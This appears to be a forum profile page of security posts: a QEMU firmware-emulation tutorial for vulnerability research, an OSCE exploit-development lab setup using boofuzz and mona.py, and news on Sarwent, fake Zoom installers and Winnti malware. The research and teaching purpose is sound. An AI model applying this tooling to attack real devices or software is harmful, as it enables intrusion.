Everything posted by Kev
MindShaRE is our periodic look at various reverse engineering tips and tricks. The goal is to keep things small and discuss some everyday aspects of reversing. You can view previous entries in this series here.

Often, people dismiss router or IoT security research as easy. "Just emulate it with QEMU!" is usually what they say. They will probably also tell you to "just buy low, sell high" to make money in the stock market. The difficult, if not impossible, part of trading stocks is knowing when prices are at their lowest and highest. Similarly, knowing how to emulate firmware with QEMU is probably the hardest part for a newcomer to the embedded security research scene. While I cannot offer much help with trading advice, I can help with firmware emulation.

Before we begin, I'll assume your firmware is UNIX-like and not running on some other real-time operating system (RTOS) such as VxWorks or Windows CE. I'll also assume you have your firmware decrypted/de-obfuscated and the root file system extracted. If you are having trouble with encrypted firmware, check out my earlier blog post on dealing with encrypted firmware.

Begin with the End in Mind

A key part of device emulation is having an end goal. Do you want to run just one binary? How about just one service? Or do you want full device emulation? Since getting firmware emulation to work properly is a time-consuming feat, your goal will greatly influence your emulation strategy. Sometimes, the countless hours lost to tweaking the emulation will justify the purchase of one of these low-cost devices.

For running a single binary such as a decryption routine, consider the more lightweight user-space QEMU emulation approach. If your goal is to write exploits, working with a physical device may be best, since exploits are ultimately used against real-world devices. Emulation may not account for subtle hardware behavior such as instruction caches, which could affect memory corruption exploits. However, emulation is perfectly fine for developing and testing exploits for higher-level vulnerabilities such as a command injection in a CGI script or a login logic flaw in PHP pages.

Determining CPU architecture and information gathering

The first step in emulating anything is determining the CPU architecture of our target. Usually, we can determine this without a device on hand. One way to determine the CPU type is by analyzing the firmware binaries. Running the file command on any binary can quickly tell us what CPU architecture we are dealing with:

Figure 1 – Outputs of the file and readelf commands

However, the file command does not provide the most detailed results. The readelf command with the -A option for an ARM binary provides much more detailed CPU information that is vital for full system emulation and cross-compilation.

Another way of determining the CPU architecture when working with wireless routers (using the TP-Link TL-WR841-ND as an example [1]) is by searching for the device model on the Internet. This will usually land us on an OpenWRT device page that provides information on the device hardware. A quick search can also tell us the main System on Chip (SoC) part number as well as the device FCC ID. We can then look for the datasheet of the corresponding SoC and determine the exact CPU architecture. This is also a great time to search for the family-specific processor core datasheet and familiarize yourself with the CPU. This datasheet will provide device-specific information such as the load address and low-level memory layout, which may help with emulation and analysis. You can also look up the FCC filing reports to get a glimpse of the internals of the device.
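For reference, here is a hedged sketch of the binary-inspection route described above; the path and the exact output are illustrative placeholders, not taken from the original post:

file squashfs-root/bin/busybox
  busybox: ELF 32-bit LSB executable, ARM, EABI5 version 1 (SYSV), dynamically linked, interpreter /lib/ld-uClibc.so.0, stripped

readelf -A squashfs-root/bin/busybox
  Attribute Section: aeabi
  File Attributes
    Tag_CPU_name: "ARM926EJ-S"
    Tag_CPU_arch: v5TEJ
    Tag_ARM_ISA_use: Yes
    Tag_THUMB_ISA_use: Thumb-1

The readelf attributes are what tell you, for example, which ARM core and ISA level to ask QEMU for.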
User-mode emulation

Per-process emulation is useful when only one binary needs to be emulated. There are two ways to emulate a single binary with user-mode QEMU. The first option is user-mode process emulation. This can be done with one of the following commands:

qemu-mipsel -L <prefix> <binary>
qemu-arm -L <prefix> <binary>
qemu-<arch> -L <prefix> <binary>

The -L option is important when the binary links to external dependencies such as uClibc or encryption libraries. It tells the dynamic linker to look for dependencies with the provided prefix. Below is an example of running the imgdecrypt binary from the D-Link DIR-882 router.

Figure 2 - imgdecrypt

Another way to emulate the process is to perform a cross-architectural chroot with QEMU. To do this, we copy the qemu-<arch>-static binary to the /usr/bin/ directory of the firmware root file system. We then chroot into the firmware root and obtain a working shell:

Figure 3 - Using QEMU to perform a cross-architectural chroot

This is possible because QEMU registers with the kernel during installation, via the binfmt_misc mechanism, to handle binaries with certain magic bytes. As a consequence, this technique is incompatible with the Scratchbox cross-compilation toolkit, which leverages the same mechanism. You can find a more detailed explanation of the cross-architectural chroot in this StackOverflow post.

This method is my preferred first attempt at emulating a device. It is quick to set up and allows me to experiment with different binaries within the firmware root file system without worrying too much about dependencies. Note that in this mode of emulation, none of the userland services is initialized in the chroot shell, so none of the system or network services are available. However, this can be sufficient for running just one binary or testing one small component.
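As a concrete sketch of the chroot approach (the architecture and extraction directory are assumptions for illustration; substitute your own):

# install the statically linked QEMU user-mode binaries, e.g. on Debian/Ubuntu
sudo apt install qemu-user-static

# copy the matching static emulator into the extracted firmware root
sudo cp "$(which qemu-mipsel-static)" ./squashfs-root/usr/bin/

# chroot in; binfmt_misc transparently runs the MIPS binaries under QEMU
sudo chroot ./squashfs-root /bin/sh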
Bring out the big guns: Full system emulation

Sometimes we'll need to analyze the firmware more comprehensively and will benefit from full system emulation. There are many ways to fully emulate a device. Here are a few of the most common emulation techniques. These techniques have been used by researchers to find real bugs that were subsequently submitted to the ZDI program.

In the first part of the emulation process, we use QEMU to create a full Linux virtual machine running on the target architecture. We then transfer the firmware root file system into the VM and chroot into it. To create a full VM running in QEMU, we typically need the following:

- A QEMU disk image file (qcow2)
- A Linux kernel image compiled for the target architecture
- (sometimes) an initial RAM disk image (initrd)

To get the above items, you can certainly set up a cross-compiler, build the kernel, and download an installer to get the initial RAM disk. You could then install Linux onto the QEMU disk image file. However, cross-compiling a kernel is a substantial side quest for the casual bug hunter or Linux beginner. If you are interested in preparing these files yourself, check out the links in the further reading section. In this blog, we'll take a simpler approach: we will download and use the pre-built Debian images prepared by Aurélien Jarno, a Debian developer. Alternatively, you could use the images provided by Chris (@_hugsy_), the author of the "gef" plugin.

With all the files in place, we can start a QEMU VM with the proper CPU architecture using one of the following commands:

sudo qemu-system-mipsel -M malta -kernel vmlinux-2.6.32-5-4kc-malta -hda debian_squeeze_mipsel_standard.qcow2 -append "root=/dev/sda1 console=tty0"

sudo qemu-system-mipsel -M malta -kernel vmlinux-3.2.0-4-4kc-malta -hda debian_wheezy_mipsel_standard.qcow2 -append "root=/dev/sda1 console=tty0"

sudo qemu-system-arm -M vexpress-a9 -kernel vmlinuz-3.2.0-4-vexpress -initrd initrd.img-3.2.0-4-vexpress -drive if=sd,file=debian_wheezy_armhf_standard.qcow2 -append "root=/dev/mmcblk0p2"

sudo qemu-system-arm -M vexpress-a9 -kernel vmlinuz-3.2.0-4-vexpress -initrd initrd.img-3.2.0-4-vexpress -drive if=sd,file=debian_wheezy_armhf_desktop.qcow2 -append "root=/dev/mmcblk0p2"

The -M (or -machine) option specifies the board model to emulate; it allows the user to select the target hardware platform. The -append option lets you tweak the options passed to the Linux kernel. I like to put the QEMU command into a bash script to speed up the process of making adjustments and starting the VM.

Additionally, we should append the following options to the QEMU call to connect the network interfaces and add port forwarding:

-net user,hostfwd=tcp::80-:80,hostfwd=tcp::443-:443,hostfwd=tcp::2222-:22 \
-net nic

Adding these options allows us to communicate with the VM via SSH through port 2222 of the host computer, as well as reach the HTTP and HTTPS pages of the emulated firmware.

Figure 4 - Starting a pre-built Debian image

Once the VM boots and gives us a working Debian system, the second part of the emulation begins. Transfer the root file system of the firmware to the VM using SCP or HTTP. I find packing the whole root file system into a tarball the most effective way to handle the transfer. We then need to bind-mount the /proc, /dev, and /sys directories of the VM onto the corresponding directories in the firmware file system. Finally, we chroot into the firmware file system using the following command:

chroot ~/firmware_rootfs /bin/sh

The second argument tells chroot to run /bin/sh after changing the root directory. You may need to change this to /bin/bash or /bin/busybox to obtain a working shell.

Figure 5 - Busybox

With a working shell, we can navigate to /etc/rc.d or /etc/init.d and run the appropriate RC script to kick off the userland services. Closely analyze the rc.d folder and inspect the scripts; you'll need to tweak the startup scripts to account for missing network interfaces, failing NVRAM library calls, and all sorts of fun stuff. This part of the emulation process is very much like dealing with encrypted firmware: each firmware will be an adventure of its own, which is the very definition of research. Often, you'll want to tweak the rcS scripts just enough to get the target service to run properly. This part of the process can take up weeks of investigation and additional work.
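To condense the in-VM steps above into one hedged sketch (run inside the Debian guest; the tarball name and paths are illustrative):

# unpack the transferred firmware root file system
mkdir ~/firmware_rootfs && tar -xf rootfs.tar.gz -C ~/firmware_rootfs

# bind-mount the pseudo-filesystems the firmware binaries expect
mount -o bind /proc ~/firmware_rootfs/proc
mount -o bind /dev ~/firmware_rootfs/dev
mount -o bind /sys ~/firmware_rootfs/sys

# change root and try to get a shell
chroot ~/firmware_rootfs /bin/sh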
Emulation is a lot of work. Sometimes standing on the shoulders of giants is the better way to go. There are two main projects that help speed up the process of firmware emulation: Firmadyne and ARM-X.

60% of the time, it works every time: Firmadyne

Firmadyne is great when it works. It is a firmware emulation platform that attempts to automagically emulate Linux-based device firmware. Firmadyne supports both MIPS and ARM processors. It will extract the root file system, infer network interfaces, and create the QEMU disk image for emulation. It also attempts to emulate NVRAM. If you need full system emulation for a new target, I recommend giving Firmadyne a try first. You can then attempt to fix some of the errors it runs into before trying other emulation techniques. I have had trouble running Firmadyne with newer QEMU releases; however, installing it with Docker typically avoids this problem.

ARM-X

The ARM-X Firmware Emulation Framework targets ARM-based firmware. It is a collection of kernels, scripts, and file systems for emulating firmware with QEMU. It comes with a few example emulation configurations to help you with your project. I recommend watching the hour-long Hack In The Box 2019 presentation by Saumil Shah (@therealsaumil) on YouTube before trying out the ARM-X VM. If you are completely new to IoT firmware research, the presentation is also a great resource to start with.

Conclusion

Hopefully, with the help of this blog, you are ready to "just emulate it with QEMU." All the techniques demonstrated above (including ARM-X and Firmadyne) have been used in various submissions to our program. All roads may lead to Rome, but there is no single, fixed way to emulate firmware with QEMU. Explore different techniques and see what works for you. Familiarize yourself with the knowledge to wield the beast named QEMU, and you will be surprised at how it can help you in unexpected ways. Finally, I would love to learn about your emulation techniques and look forward to your next submission. You can find me on Twitter @TrendyTofu, and follow the team for the latest in exploit techniques and security patches.

Source: zerodayinitiative.com
-
Can someone check whether this file is safe?
Kev replied to grandson's topic in Discutii incepatori
it's a f#cking Minecraft crack (virus-ridden, of course) -
Hey, you blockhead, I don't know what your problem with me is, but I personally have known Nadia since she was a toddler playing in the sandbox, haters, fake
-
Security researchers have discovered a new version of the Sarwent malware with new command functionality, such as executing PowerShell commands, and a preference for using RDP. Dating back to 2018, Sarwent has mostly been known as a dropper with a limited set of commands, such as download, update, and vnc. Dropper malware is a kind of Trojan designed to install other malware on a target system. Researchers at SentinelOne warned that attackers are now using a new version of Sarwent to target the Remote Desktop Protocol (RDP) port on Windows systems to execute backdoor commands. SentinelOne researcher Jason Reaves also said Sarwent uses the same binary signer as one or more TrickBot operators. Furthermore, Reaves pointed out that the "rdp" command and code execution look to perform tasks such as:

- Add users
- List groups and users
- Punch a hole in the local firewall

These functions could forewarn that actors are preparing to target systems for RDP access at a later time. Readers may also remember that attackers have been known to exploit RDP-related vulnerabilities, such as the BlueKeep vulnerability (CVE-2019-0708). In conclusion, cyber criminals will likely continue to leverage malware like Sarwent to abuse RDP for monetization, such as selling access to systems.

Via securezoo.com
-
YES! I have proof: I appear on the winners' list, and the tracker shows a different signature
-
Hi, I won a few products in the Winston Romania promotion, and they never arrived (pandemic). I've been waiting for 50 days. They were shipped through dpd.com; when I call, a robot answers. I call the info line at youtfreedom.ro, they dodge me; I call the DPD couriers at dpd.ro, they dodge me too. Bear in mind we're talking about a smartwatch, a portable speaker, a netbook, and a power bank. To hell with them. /edit: I checked the AWB; it shows as delivered, with a signature in the shape of an X //May they all rot
-
Claimed as the fastest internet speed tested and recorded in the world. Image: Monash University

A group of researchers from Monash, Swinburne, and RMIT universities have claimed to have successfully tested and recorded the world's fastest internet data speed of 44.2Tbps, using a single optical chip known as a micro-comb. The findings, published in the Nature Communications journal, reveal how the speed achieved has the capacity to support the high-speed internet connections of 1.8 million households in Melbourne, letting users download 1,000 HD movies in seconds.

According to the researchers, the micro-comb, touted as a smaller and lighter device than existing telecommunications hardware, was used to replace 80 infrared lasers and was load-tested in infrastructure that mirrors the networks used by the National Broadband Network. They did this by placing the micro-comb in 76.6km of installed dark optical fibre between RMIT's Melbourne city campus and Monash University's Clayton campus. The micro-comb was used to mimic a rainbow of infrared lasers so that each "laser" could be used as a separate communications channel. To simulate peak internet usage during testing, the researchers sent maximum data through each channel across 4THz of bandwidth. RMIT's Arnan Mitchell said the future ambition for the project is to scale up the current transmitters from hundreds of gigabytes per second toward tens of terabytes per second without increasing size, weight, or cost.

A sample of some of the perovskite cells used in the experiment. Image: UNSW

Elsewhere, scientists from the University of Sydney have tested how to improve the thermal stability of perovskite solar cells so they could potentially be used as an alternative to silicon-based solar cells. The scientists used a polymer-glass blanket with a pressure-tight seal to suppress the decomposition of the perovskite cells, a process known as outgassing. The test was also able to determine that the perovskite solar cells could survive more than 1,800 hours of 85% relative humidity and 75 cycles of temperatures between -40 and 85 degrees.

Via zdnet.com
-
Speaker: Jorge Orchilles

Abstract: Adversary Emulation is a type of Red Team exercise where the Red Team emulates how an adversary operates, following the same tactics, techniques, and procedures (TTPs), with a specific objective (similar to those of realistic threats or adversaries). Adversary emulations are performed using a structured approach, which can be based on a kill chain or attack flow. Methodologies and frameworks for adversary emulations will be covered shortly. Adversary emulation Red Team exercises emulate an end-to-end attack against a target organization to obtain a holistic view of the organization's preparedness for a real, sophisticated attack. This will be the main focus of SANS SEC564 Red Team Exercises and Adversary Emulation.

Command and Control is one of the most important tactics in the MITRE ATT&CK matrix, as it allows the attacker to interact with the target system and realize their objectives. Organizations leverage Cyber Threat Intelligence to understand their threat model and the adversaries that have the intent, opportunity, and capability to attack. Red Teams, Blue Teams, and virtual Purple Teams work together to understand adversary tactics, techniques, and procedures in order to perform adversary emulations and improve detective and preventive controls. The C2 Matrix was created to aggregate all the Command and Control frameworks publicly available (open source and commercial) in a single resource to assist teams in testing their own controls through adversary emulations (Red Team or Purple Team exercises). Phase 1 lists all the Command and Control features, such as the coding language used, channels (HTTP, TCP, DNS, SMB, etc.), agents, key exchange, and other operational security features and capabilities. This allows for more efficient decision-making when called upon to emulate an adversary's TTPs. It is the golden age of Command and Control (C2) frameworks. Learn how these C2 frameworks work and start testing against your organization to improve detective and preventive controls:

- Learn how Red Teams and Blue Teams work together in virtual Purple Teams
- Leverage Cyber Threat Intelligence to understand adversary tactics, techniques, and procedures
- Perform adversary emulations in Red or Purple Team Exercises
- Choose which command and control framework to use for the assessment to provide the most value
- Measure and improve people, process, and technology

Source
-
Microsoft has patented a cryptocurrency mining system that leverages human activity, including brain waves and body heat, generated when performing online tasks such as using search engines, chatbots, and reading ads. "A user can solve the computationally difficult problem unconsciously," the patent reads.

Crypto System Leveraging Body Activity Data

Microsoft Technology Licensing, the licensing arm of Microsoft Corp., has been granted an international patent for a "cryptocurrency system using body activity data." The patent was published on March 26 by the World Intellectual Property Organization (WIPO), the United Nations agency responsible for treaties involving copyright, patent, and trademark laws. The application was filed on June 20 last year. "Human body activity associated with a task provided to a user may be used in a mining process of a cryptocurrency system," the patent reads, noting that the method described may "reduce computational energy for the mining process as well as make the mining process faster."

Patent Suggests Alternative Way to Mine Cryptocurrencies

The patent describes a system where a device can verify whether "the body activity data satisfies one or more conditions set by the cryptocurrency system, and award cryptocurrency to the user whose body activity data is verified." Different types of sensors can be used to "measure or sense body activity or scan human body," the patent explains. They include "functional magnetic resonance imaging (fMRI) scanners or sensors, electroencephalography (EEG) sensors, near infrared spectroscopy (NIRS) sensors, heart rate monitors, thermal sensors, optical sensors, radio frequency (RF) sensors, ultrasonic sensors, cameras, or any other sensor or scanner" that will do the same job. The system may reward cryptocurrency to an owner or a task operator "for providing services, such as, search engines, chatbots, applications or websites, offering users access for free to paid contents (e.g. video and audio streaming or electric books), or sharing information or data with users," the patent details.

The idea of mining cryptocurrencies using human body heat has previously been explored by other organizations. For example, Manuel Beltrán, founder of the Dutch Institute of Human Obsolescence, set up an experiment in 2018 to mine cryptocurrencies with a special bodysuit that harvested human body heat into a sustainable energy source. The electricity generated was then fed to a computer mining cryptocurrencies.

What do you think of Microsoft's new cryptocurrency mining system? Let us know in the comments section below.

Via news.bitcoin.com
-
Ping Castle

Introduction

The risk level regarding Active Directory security has changed. Several vulnerabilities have been made popular by tools like mimikatz and sites like adsecurity.org. Ping Castle is a tool designed to quickly assess the Active Directory security level with a methodology based on a risk assessment and a maturity framework. It does not aim at a perfect evaluation but rather at an efficient compromise.

  PingCastle (Version 2.5.2.0)
  Get Active Directory Security at 80% in 20% of the time
  End of support: 31/07/2020
  Vincent LE TOUX (contact@pingcastle.com)
  https://www.pingcastle.com

  Using interactive mode.
  Do not forget that there are other command line switches like --help that you can use
  What you would like to do?
  1-healthcheck -Score the risk of a domain
  2-graph       -Analyze admin groups and delegations
  3-conso       -Aggregate multiple reports into a single one
  4-nullsession -Perform a specific security check
  5-carto       -Build a map of all interconnected domains
  6-scanner     -Perform specific security checks on workstations

Check https://www.pingcastle.com for the documentation and methodology.

Build

PingCastle is a C# project which can be built with Visual Studio 2012 through Visual Studio 2017.

Support & lifecycle

For support requests, you should contact support@pingcastle.com. Support for the Basic Edition is provided on a best-effort basis, with fixes delivered when a new version is released. The Basic Edition of PingCastle is released every 6 months (January, August) and this repository is updated at each release. If you need changes, please contact contact@pingcastle.com for support packages.

License

PingCastle source code is licensed under a proprietary license and the Non-Profit Open Software License ("Non-Profit OSL") 3.0. Unless a license is purchased, you are not allowed to make any profit from this source code. To be more specific:

- It is allowed to run PingCastle without purchasing any license in for-profit companies, as long as the company itself (or its ITSM provider) runs it.
- To build services based on PingCastle AND earn money from them, you MUST purchase a license.

Ping Castle uses the following open source components:

- Bootstrap, licensed under the MIT license
- JQuery, licensed under the MIT license
- vis.js, licensed under the MIT license

Author

Author: Vincent LE TOUX. You can contact me at vincent.letoux@gmail.com

Download

pingcastle-master.zip or git clone https://github.com/vletoux/pingcastle.git
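Once downloaded, a hedged quick start; the flags below are the non-interactive equivalents of menu option 1, but double-check --help on your version, and the domain name is a placeholder:

PingCastle.exe --healthcheck --server mydomain.local

This runs the health check without the interactive menu and drops an HTML report into the working directory.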
Source
-
OBLIGATORY INTRO

Howdy! This is the first post in a multi-part series detailing steps taken, and exploits written, as part of my OSCE exam preparation. I intend to use these practice sessions to refine my exploit development process while sharing any knowledge gained. I originally wanted to take this course a few years ago but could never quite lock it in. Recently, I was fortunate enough to have work fund the course. Since then, I've been spending my free time listening to Muts' dulcet tones and working through the modules. I wrapped up the official course material yesterday and plan to work through some additional material recommended by some OSCE graduates. What makes the timing awesome for me is that I just finished up CSC 748 - Software Exploitation for my graduate course work. The course dealt with Windows x86 exploitation, fuzzing, and shellcoding. Sound familiar? It dove into some topics that OSCE doesn't cover, such as using ROP to bypass DEP. I'm incredibly happy to have been able to do both of them one right after the other. I'll be including some of the shellcoding tricks I learned from the course in this series at some point.

EXPLOIT DEVELOPMENT ENVIRONMENT

This post will cover setting up a lab environment. While this may not be the most interesting topic, we'll cover some setup tips that may be helpful. Don't worry, we won't go step by step through setting up all these things unless it's warranted.

OPERATING SYSTEM

For these practice sessions, we'll attempt to stick reasonably close to an OSCE environment by using a 32-bit Windows 7 VM. Unfortunately, Microsoft has taken down the IE/Edge virtual machine images from their site. You can only get the Windows 10 images nowadays. Fear not! If you find yourself in need of an older version, they're archived and can still be downloaded at the link below.

Windows VM Images

SCRIPTING LANGUAGE

We'll be writing all proof of concepts using Python 3. Python 2 still gets a lot of use in PoCs for exploits and exploit-centric tooling; however, I strongly prefer 3 as a language overall and will stick to it throughout these posts. The latest version of Python (3.8.2 at the time of this writing) can be found here.

HEX EDITOR

There are times we'll need a hex editor. I prefer 010 when working on Windows.

NASMSHELL

Part of creating shellcode is janking™ around with the instructions to find what works in the smallest amount of space without known bad characters. nasmshell makes it incredibly easy to check which opcodes are generated by which instructions. Of note, nasmshell requires Python 2.

FUZZER

For network fuzzing, we'll be using boofuzz. It's a fork of, and the successor to, the venerable Sulley fuzzing framework. Sulley has been the preeminent open source fuzzer for some time but has fallen out of maintenance. Installation consists of a simple pip command:

pip install boofuzz --user

AUTOMATIC CRASH DETECTION & PROCESS RESTART

This part is totally optional. Boofuzz offers a utility called process_monitor.py that detects crashes and restarts the target binary automatically. It requires a few additional libraries to run and must run on the target machine itself. As we'll be doing all coding and fuzzing from the same Windows environment, this is fine. The install steps are located here. I won't copy and paste them here; however, I will note something that I was forced to do during installation. All of the libraries for process_monitor.py are installed into my Python 2.7 environment, whereas boofuzz is installed into my Python 3.8 environment. This is because pydasm requires Python 2.7. The end result is that we'll be scripting fuzzers in Python 3 and executing process_monitor.py with Python 2.
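To give a feel for what those Python 3 fuzzer scripts look like, here is a minimal, hedged boofuzz sketch. The target address/port and the TRUN protocol definition are assumptions for illustration (the boofuzz API has shifted between versions, so check the docs for yours):

from boofuzz import *

# point the session at the service under test (host/port are placeholders)
session = Session(target=Target(connection=SocketConnection("192.168.56.101", 9999, proto="tcp")))

# define one message: a fixed verb, a space, and a fuzzable argument
s_initialize("trun")
s_string("TRUN", fuzzable=False)  # keep the command itself intact
s_delim(" ", fuzzable=False)
s_string("FUZZ")                  # this field gets mutated
s_static("\r\n")

session.connect(s_get("trun"))
session.fuzz()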
There is also a note on the process_monitor.py install page about an additional requirement; I didn't need to do anything to satisfy it, as my flare-vm install script pulled it down for me.

DEBUGGER

The topic of which debugger to use seems to be pretty contentious in the OSCE forums/chats. We'll be using WinDbg. The reason is that I spent 4 months using it for college and have come to like it.

FLARE-VM

To install WinDbg (and some other tools), I used the Flare-VM install script. Flare-VM will take a Windows 7-10 machine and install a plethora of RE tools. I modified flare's profile.json for a relatively lightweight installer.

Flare-VM install instructions
Customizing Installed Packages

And if you're feeling lazy, here's my profile.json:

{
  "env": {
    "TOOL_LIST_DIR": "%ProgramData%\\Microsoft\\Windows\\Start Menu\\Programs\\FLARE",
    "TOOL_LIST_SHORTCUT": "%UserProfile%\\Desktop\\FLARE.lnk",
    "RAW_TOOLS_DIR": "%SystemDrive%\\Tools",
    "TEMPLATE_DIR": "flarevm.installer.flare"
  },
  "packages": [
    {"name": "dotnetfx"},
    {"name": "powershell"},
    {"name": "vcbuildtools.fireeye"},
    {"name": "vcpython27"},
    {
      "name": "python2.x86.nopath.flare",
      "x64Only": true,
      "args": "--package-parameters \'/InstallDir:C:\\Python27.x86\'"
    },
    {"name": "libraries.python2.fireeye"},
    {"name": "libraries.python3.fireeye"},
    {"name": "windbg.flare"},
    {"name": "windbg.kenstheme.flare"},
    {"name": "windbg.ollydumpex.flare"},
    {"name": "windbg.pykd.flare"},
    {"name": "ghidra.fireeye"},
    {"name": "vbdecompiler.flare"},
    {"name": "010editor.flare"},
    {"name": "resourcehacker.flare"},
    {"name": "processdump.fireeye"},
    {"name": "7zip.flare"},
    {"name": "putty"},
    {"name": "wget"},
    {"name": "processhacker.flare"},
    {"name": "sysinternals.flare"},
    {"name": "ncat.flare"},
    {"name": "shellcode_launcher.flare"},
    {"name": "xorsearch.flare"},
    {"name": "xorstrings.flare"},
    {"name": "lordpe.flare"},
    {"name": "googlechrome.flare"},
    {"name": "nasm.fireeye"}
  ]
}

MONA.PY

Even after using Flare-VM's installer, we're still missing a key tool: mona.py. Mona is an incredible tool; it's bonkers how many facets of exploit dev on Windows are made easier with mona. To get mona up and running with WinDbg, we just need to follow these steps. We can confirm everything works by opening up WinDbg, attaching to some benign process, and running the following commands:

.load pykd.pyd
!py mona

If everything is wired up correctly, mona prints its banner:

[+] Command used: !py C:\Program Files\Windows Kits\10\Debuggers\x86\mona.py
'mona' - Exploit Development Swiss Army Knife - WinDBG (32bit)
Plugin version : 2.0 r605
Python version : 2.7.18 (v2.7.18:8d21aa21f2, Apr 20 2020, 13:19:08) [MSC v.1500 32 bit (Intel)]
PyKD version 0.3.2.2
Written by Corelan - https://www.corelan.be
Project page : https://github.com/corelan/mona
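With mona loaded, a few of the commands you will reach for constantly during exploit dev; these are standard mona features, listed here for illustration:

!py mona pattern_create 1024   # generate a cyclic pattern for finding offsets
!py mona findmsp               # locate that pattern in memory/registers after a crash
!py mona jmp -r esp            # hunt for jmp/call esp instructions in loaded modules
!py mona seh                   # find pop/pop/ret sequences for SEH overwrites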
SQLITE BROWSER

We'll need a way to look at boofuzz's results. They're stored in a database, and the provided web interface leaves something to be desired. As we'll be working on Windows, we'll need to grab a SQLite database browser. One can be found here.

WINDBG - QUALITY OF LIFE TWEAKS

We're going to be spending a ton of time in the debugger, so it should be a debugger that sparks joy! Typing .load pykd.pyd isn't terribly hard, but doing it every time you restart your debugger can be irksome. We can automatically load the file with a pretty simple trick:

- right-click on the windbg icon in the toolbar (assuming flare-vm put it there for you)
- right-click on the windbg (x86) menu item
- select properties

Once we're in the properties menu, perform the following:

- click on the Shortcut tab
- add the following command-line option to the Target field: -c ".load pykd.pyd"

SANE LOGGING LOCATION

Without any configuration, mona.py stores command results beside the debugger's exe. The exe is stored six levels deep under Program Files and isn't exactly accessible. The command below will get the logging location squared away for us:

!py mona config -set workingfolder c:\monalogs\%p_%i

The %p will get populated with the debuggee's name and the %i will be replaced by the debuggee's pid, e.g. C:\monalogs\TFTPServerSP_1300.

PERSONALIZED WORKSPACE W/ SCRATCHPAD

You can personalize WinDbg quite a bit. There are a few themes shipped with WinDbg, and some others can be found with Google, though it's not obvious how to work with them. WinDbg will read workspace settings from the registry or a .wew file. If you're loading a .reg file, you can simply double-click the file and it will load. However, we'll be creating our own .wew file.

CREATE THE LAYOUT

We'll take a look at my setup, which is pretty much default, with a slight modification. I like having WinDbg's scratchpad open. It's a convenient place for simple notes (usually addresses/offsets). It's not open in the default configuration, so let's fix that:

- Open WinDbg
- Press alt+8 to open the scratchpad
- Position it wherever you like

My setup looks like this, with the scratchpad positioned to the right of the assembly window.

ASSOCIATE THE SCRATCHPAD

If the scratchpad isn't associated with a file on disk, the information disappears when the debugger exits. Fortunately, making the scratchpad persistent is easy. First, right-click the scratchpad's top bar and select Associate with file.... After that, simply pick a location (I store mine in C:\monalogs).

SAVE THE WORKSPACE

With a new layout created, we need to save it to disk. There are four different options to save a workspace; we want to use the Save Workspace to File... option. Store it wherever you like.

AUTOLOAD THE WORKSPACE

With the scratchpad set up and the workspace file saved somewhere, we need to configure WinDbg to load the workspace on startup. The premise is the same as what we used to autoload pykd. We just need to add the following command-line option to the Target field in WinDbg's properties:

-WF "C:\Users\vagrant\Desktop\with_scratchpad.WEW"

FURTHER CONFIGURATION

In case you want to go further, you could use some of the themes listed below as a starting point and tweak until you're content:

https://github.com/lololosys/windbg-theme
https://github.com/Stolas/WinDBG-DarkTheme
C:\ProgramData\chocolatey\lib\windbg.kenstheme.flare\tools\ken.reg
https://www.zachburlingame.com/2011/12/customizing-your-windbg-workspace-and-color-scheme/

OBLIGATORY OUTRO

The next post in this series will cover exploiting VulnServer's TRUN command. Check it out here.

Source epi052.gitlab.io
-
Hackers are taking advantage of video conferencing apps like Zoom to infect systems with malicious routines. Security researchers from Trend Micro observed two malware samples that pose as Zoom installers but, when decoded, contain malware. The malicious fake installers are not distributed through official distribution channels.

Fake Zoom Installers

Of the two malware samples, one installs a backdoor that allows attackers to gain access remotely; the other plants the Devil Shadow botnet on devices. The malicious installer closely resembles the official version, and it contains encrypted files that decrypt into the malware. Upon installation, the malware kills all running remote utilities and opens TCP port 5650 to gain remote access to the infected system.

The other sample observed by researchers installs the Devil Shadow botnet. The infection starts with the malicious installer, with a file named pyclient.cmd which contains malicious commands. With this sample, too, the threat actors include a copy of the official Zoom installer to deceive victims. The tampered installer deploys a malicious archive and code, along with the commands for persistence and communication. The malware sends the gathered information to its C&C every 30 seconds whenever the computer is turned on.

In another campaign, attackers repackaged the legitimate Zoom installer with the WebMonitor RAT. The infection starts with downloading the malicious file ZoomIntsaller.exe from malicious sources. Due to the coronavirus pandemic, many companies around the world have asked employees to work from home, which increases the usage of video conferencing apps, and these are heavily targeted by attackers.

Via gbhackers.com
-
Hackers infect multiple game developers with advanced malware
Kev posted a topic in Stiri securitate
Never-before-seen PipeMon hit one developer's build system, another's game servers.

One of the world's most prolific hacking groups recently infected several Massively Multiplayer Online game makers, a feat that made it possible for the attackers to push malware-tainted apps to one target's users and to steal the in-game currencies of a second victim's players. Researchers from Slovakian security company ESET have tied the attacks to Winnti, a group that has been active since at least 2009 and is believed to have carried out hundreds of mostly advanced attacks. Targets have included Chinese journalists, Uyghur and Tibetan activists, the government of Thailand, and prominent technology organizations. Winnti has been tied to the 2010 hack that stole sensitive data from Google and 34 other companies. More recently, the group has been behind the compromise of the CCleaner distribution platform that pushed malicious updates to millions of people. Winnti also carried out a separate supply-chain attack that installed a backdoor on 500,000 ASUS PCs.

The recent attack used a never-before-seen backdoor that ESET has dubbed PipeMon. To evade security defenses, PipeMon installers bore the imprimatur of a legitimate Windows signing certificate that was stolen from Nfinity Games during a 2018 hack of that gaming developer. The backdoor, which gets its name from the multiple pipes one module uses to communicate with another and from the project name of the Microsoft Visual Studio project used by the developers, used the location of Windows print processors so it could survive reboots. Nfinity representatives weren't immediately available to comment.

A strange game

In a post published early Thursday morning, ESET revealed little about the infected companies except to say they included several South Korea- and Taiwan-based developers of MMO games that are available on popular gaming platforms and have thousands of simultaneous players. The ability to gain such deep access to at least two of the latest targets is one testament to the skill of Winnti members. Its theft of the certificate belonging to Nfinity Games during a 2018 supply-chain attack on a different crop of game makers is another. Based on the people and organizations Winnti targets, researchers have tied the group to the Chinese government. Often, the hackers target Internet services and software and game developers with the objective of using any stolen data to better attack the ultimate targets.

Certified fraud

Windows requires certificate signing before software drivers can access the kernel, which is the most security-critical part of any operating system. The certificates, which must be obtained from Windows-trusted authorities after purchasers prove they are providers of legitimate software, can also help bypass antivirus and other endpoint protections. As a result, certificates are frequent plunder in breaches. Despite the theft dating to a 2018 attack, the certificate owner didn't revoke it until ESET notified it of the abuse. Tudor Dumitras, co-author of a 2018 paper that studied code-signing certificate compromises, found that it isn't unusual to see long delays for revocations, particularly when compared with those of TLS certificates used for websites. With requirements that Web certificates be openly published, it's much easier to track and identify thefts. Not so with code-signing certificates.
